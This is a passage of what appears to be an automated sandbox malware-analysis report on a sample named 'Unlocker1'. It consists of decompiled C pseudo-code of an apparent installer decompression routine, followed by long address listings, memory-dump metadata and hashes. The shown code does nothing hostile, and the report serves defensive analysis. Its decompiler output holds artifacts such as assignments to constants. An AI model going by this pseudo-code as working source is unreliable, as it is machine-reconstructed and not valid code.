                                                                                                                                                              							__eflags = __ebx - 0xe;
                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              							if(__ebx >= 0xe) {
                                                                                                                                                              								__ebx = 0;
                                                                                                                                                              								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                              								L102:
                                                                                                                                                              								__eflags =  *(__ebp - 0x48);
                                                                                                                                                              								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              									__eax = __eax + __ebx;
                                                                                                                                                              									 *(__ebp - 0x40) = 4;
                                                                                                                                                              									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              									__eax =  *(__ebp - 4);
                                                                                                                                                              									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									L108:
                                                                                                                                                              									__ebx = 0;
                                                                                                                                                              									 *(__ebp - 0x58) = __eax;
                                                                                                                                                              									 *(__ebp - 0x50) = 1;
                                                                                                                                                              									 *(__ebp - 0x44) = 0;
                                                                                                                                                              									 *(__ebp - 0x48) = 0;
                                                                                                                                                              									L112:
                                                                                                                                                              									__eax =  *(__ebp - 0x40);
                                                                                                                                                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              										_t391 = __ebp - 0x2c;
                                                                                                                                                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              										__eflags =  *_t391;
                                                                                                                                                              										goto L119;
                                                                                                                                                              									}
                                                                                                                                                              									__eax =  *(__ebp - 0x50);
                                                                                                                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              									__eax =  *(__ebp - 0x58);
                                                                                                                                                              									__esi = __edi + __eax;
                                                                                                                                                              									 *(__ebp - 0x54) = __esi;
                                                                                                                                                              									__ax =  *__esi;
                                                                                                                                                              									__ecx = __ax & 0x0000ffff;
                                                                                                                                                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              										__ecx = 0;
                                                                                                                                                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              										__ecx = 1;
                                                                                                                                                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              										__ebx = 1;
                                                                                                                                                              										__ecx =  *(__ebp - 0x48);
                                                                                                                                                              										__ebx = 1 << __cl;
                                                                                                                                                              										__ecx = 1 << __cl;
                                                                                                                                                              										__ebx =  *(__ebp - 0x44);
                                                                                                                                                              										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              										__cx = __ax;
                                                                                                                                                              										__cx = __ax >> 5;
                                                                                                                                                              										__eax = __eax - __ecx;
                                                                                                                                                              										__edi = __edi + 1;
                                                                                                                                                              										__eflags = __edi;
                                                                                                                                                              										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              										 *__esi = __ax;
                                                                                                                                                              										 *(__ebp - 0x50) = __edi;
                                                                                                                                                              									} else {
                                                                                                                                                              										 *(__ebp - 0x10) = __edx;
                                                                                                                                                              										0x800 = 0x800 - __ecx;
                                                                                                                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              										 *__esi = __dx;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              										L111:
                                                                                                                                                              										_t368 = __ebp - 0x48;
                                                                                                                                                              										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              										__eflags =  *_t368;
                                                                                                                                                              										goto L112;
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L109;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								__ecx =  *(__ebp - 0xc);
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              									__ecx =  *(__ebp - 0x10);
                                                                                                                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              									__ebx = __ebx | 0x00000001;
                                                                                                                                                              									__eflags = __ebx;
                                                                                                                                                              									 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              									L101:
                                                                                                                                                              									_t338 = __ebp - 0x48;
                                                                                                                                                              									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              									__eflags =  *_t338;
                                                                                                                                                              									goto L102;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L99;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__edx =  *(__ebp - 4);
                                                                                                                                                              							__eax = __eax - __ebx;
                                                                                                                                                              							 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              							goto L108;
                                                                                                                                                              						case 0x1a:
                                                                                                                                                              							L56:
                                                                                                                                                              							__eflags =  *(__ebp - 0x64);
                                                                                                                                                              							if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x68);
                                                                                                                                                              							__al =  *(__ebp - 0x5c);
                                                                                                                                                              							__edx =  *(__ebp - 8);
                                                                                                                                                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              							 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              							__ecx =  *(__ebp - 0x14);
                                                                                                                                                              							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              							__eax = __ecx + 1;
                                                                                                                                                              							__edx = 0;
                                                                                                                                                              							_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              							__edx = _t192;
                                                                                                                                                              							goto L79;
                                                                                                                                                              						case 0x1b:
                                                                                                                                                              							goto L75;
                                                                                                                                                              						case 0x1c:
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L123:
                                                                                                                                                              								__eflags =  *(__ebp - 0x64);
                                                                                                                                                              								if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              								}
                                                                                                                                                              								__edx =  *(__ebp - 8);
                                                                                                                                                              								__cl =  *(__eax + __edx);
                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                              								 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              								 *(__eax + __edx) = __cl;
                                                                                                                                                              								__eax = __eax + 1;
                                                                                                                                                              								__edx = 0;
                                                                                                                                                              								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              								__edx = _t414;
                                                                                                                                                              								__eax =  *(__ebp - 0x68);
                                                                                                                                                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              								__eflags =  *(__ebp - 0x30);
                                                                                                                                                              								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              								 *(__ebp - 0x14) = _t414;
                                                                                                                                                              								if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L80;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              							goto L170;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e35
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e46
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e4f
                                                                                                                                                              0x00405e52
                                                                                                                                                              0x00405e55
                                                                                                                                                              0x00405e59
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e5f
                                                                                                                                                              0x00405e62
                                                                                                                                                              0x00405e64
                                                                                                                                                              0x00405e65
                                                                                                                                                              0x00405e68
                                                                                                                                                              0x00405e6a
                                                                                                                                                              0x00405e6b
                                                                                                                                                              0x00405e6d
                                                                                                                                                              0x00405e70
                                                                                                                                                              0x00405e75
                                                                                                                                                              0x00405e7a
                                                                                                                                                              0x00405e83
                                                                                                                                                              0x00405e96
                                                                                                                                                              0x00405e99
                                                                                                                                                              0x00405ea5
                                                                                                                                                              0x00405ecd
                                                                                                                                                              0x00405ecf
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405ee1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed4
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405eab
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb9
                                                                                                                                                              0x00405ec1
                                                                                                                                                              0x00405ec4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405eeb
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00405ef4
                                                                                                                                                              0x00405f04
                                                                                                                                                              0x00405f07
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0d
                                                                                                                                                              0x00405f11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f13
                                                                                                                                                              0x00405f19
                                                                                                                                                              0x00405f43
                                                                                                                                                              0x00405f49
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00405f1f
                                                                                                                                                              0x00405f22
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f32
                                                                                                                                                              0x00405f3a
                                                                                                                                                              0x00405f3d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f82
                                                                                                                                                              0x00405f88
                                                                                                                                                              0x00405f8b
                                                                                                                                                              0x00405f98
                                                                                                                                                              0x00405fa0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f5b
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00405f67
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f75
                                                                                                                                                              0x00405f78
                                                                                                                                                              0x00405f7b
                                                                                                                                                              0x00405f80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405fa8
                                                                                                                                                              0x00405faa
                                                                                                                                                              0x00405fad
                                                                                                                                                              0x0040601e
                                                                                                                                                              0x00406021
                                                                                                                                                              0x00406024
                                                                                                                                                              0x0040602b
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00405faf
                                                                                                                                                              0x00405fb3
                                                                                                                                                              0x00405fb6
                                                                                                                                                              0x00405fb8
                                                                                                                                                              0x00405fbb
                                                                                                                                                              0x00405fbe
                                                                                                                                                              0x00405fc0
                                                                                                                                                              0x00405fc3
                                                                                                                                                              0x00405fc5
                                                                                                                                                              0x00405fca
                                                                                                                                                              0x00405fcd
                                                                                                                                                              0x00405fd0
                                                                                                                                                              0x00405fd4
                                                                                                                                                              0x00405fdb
                                                                                                                                                              0x00405fde
                                                                                                                                                              0x00405fe5
                                                                                                                                                              0x00405fe9
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x00406604
                                                                                                                                                              0x00406607
                                                                                                                                                              0x00406611
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406611
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e7
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                                                              • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                                                                                                                                              • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                                                              • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00405DF9(void* __ecx) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				unsigned int _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				signed int _v44;
                                                                                                                                                              				signed int _v48;
                                                                                                                                                              				signed int _v52;
                                                                                                                                                              				signed int _v56;
                                                                                                                                                              				signed int _v60;
                                                                                                                                                              				signed int _v64;
                                                                                                                                                              				signed int _v68;
                                                                                                                                                              				signed int _v72;
                                                                                                                                                              				signed int _v76;
                                                                                                                                                              				signed int _v80;
                                                                                                                                                              				signed int _v84;
                                                                                                                                                              				signed int _v88;
                                                                                                                                                              				signed int _v92;
                                                                                                                                                              				signed int _v95;
                                                                                                                                                              				signed int _v96;
                                                                                                                                                              				signed int _v100;
                                                                                                                                                              				signed int _v104;
                                                                                                                                                              				signed int _v108;
                                                                                                                                                              				signed int _v112;
                                                                                                                                                              				signed int _v116;
                                                                                                                                                              				signed int _v120;
                                                                                                                                                              				intOrPtr _v124;
                                                                                                                                                              				signed int _v128;
                                                                                                                                                              				signed int _v132;
                                                                                                                                                              				signed int _v136;
                                                                                                                                                              				void _v140;
                                                                                                                                                              				void* _v148;
                                                                                                                                                              				signed int _t537;
                                                                                                                                                              				signed int _t538;
                                                                                                                                                              				signed int _t572;
                                                                                                                                                              
                                                                                                                                                              				_t572 = 0x22;
                                                                                                                                                              				_v148 = __ecx;
                                                                                                                                                              				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                                                              				if(_v52 == 0xffffffff) {
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L3:
                                                                                                                                                              					_t537 = _v140;
                                                                                                                                                              					if(_t537 > 0x1c) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					switch( *((intOrPtr*)(_t537 * 4 +  &M0040684B))) {
                                                                                                                                                              						case 0:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v116 = _v116 + 1;
                                                                                                                                                              							_t537 =  *_v116;
                                                                                                                                                              							__eflags = _t537 - 0xe1;
                                                                                                                                                              							if(_t537 > 0xe1) {
                                                                                                                                                              								goto L174;
                                                                                                                                                              							}
                                                                                                                                                              							_t542 = _t537 & 0x000000ff;
                                                                                                                                                              							_push(0x2d);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_pop(_t576);
                                                                                                                                                              							_push(9);
                                                                                                                                                              							_pop(_t577);
                                                                                                                                                              							_t622 = _t542 / _t576;
                                                                                                                                                              							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                                                              							_v64 = _t617;
                                                                                                                                                              							_v32 = (1 << _t622) - 1;
                                                                                                                                                              							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                                                              							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                                                              							__eflags = 0x600 - _v124;
                                                                                                                                                              							if(0x600 == _v124) {
                                                                                                                                                              								L12:
                                                                                                                                                              								__eflags = _t625;
                                                                                                                                                              								if(_t625 == 0) {
                                                                                                                                                              									L14:
                                                                                                                                                              									_v76 = _v76 & 0x00000000;
                                                                                                                                                              									_v68 = _v68 & 0x00000000;
                                                                                                                                                              									goto L17;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L13;
                                                                                                                                                              								}
                                                                                                                                                              								do {
                                                                                                                                                              									L13:
                                                                                                                                                              									_t625 = _t625 - 1;
                                                                                                                                                              									__eflags = _t625;
                                                                                                                                                              									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                                                              								} while (_t625 != 0);
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v8;
                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                              								GlobalFree(_v8); // executed
                                                                                                                                                              							}
                                                                                                                                                              							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              							__eflags = _t537;
                                                                                                                                                              							_v8 = _t537;
                                                                                                                                                              							if(_t537 == 0) {
                                                                                                                                                              								goto L174;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v124 = 0x600;
                                                                                                                                                              								goto L12;
                                                                                                                                                              							}
                                                                                                                                                              						case 1:
                                                                                                                                                              							L15:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 1;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                                                              							_v116 = _v116 + 1;
                                                                                                                                                              							_t50 =  &_v76;
                                                                                                                                                              							 *_t50 = _v76 + 1;
                                                                                                                                                              							__eflags =  *_t50;
                                                                                                                                                              							L17:
                                                                                                                                                              							__eflags = _v76 - 4;
                                                                                                                                                              							if(_v76 < 4) {
                                                                                                                                                              								goto L15;
                                                                                                                                                              							}
                                                                                                                                                              							_t550 = _v68;
                                                                                                                                                              							__eflags = _t550 - _v120;
                                                                                                                                                              							if(_t550 == _v120) {
                                                                                                                                                              								L22:
                                                                                                                                                              								_v76 = 5;
                                                                                                                                                              								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                                                              								goto L25;
                                                                                                                                                              							}
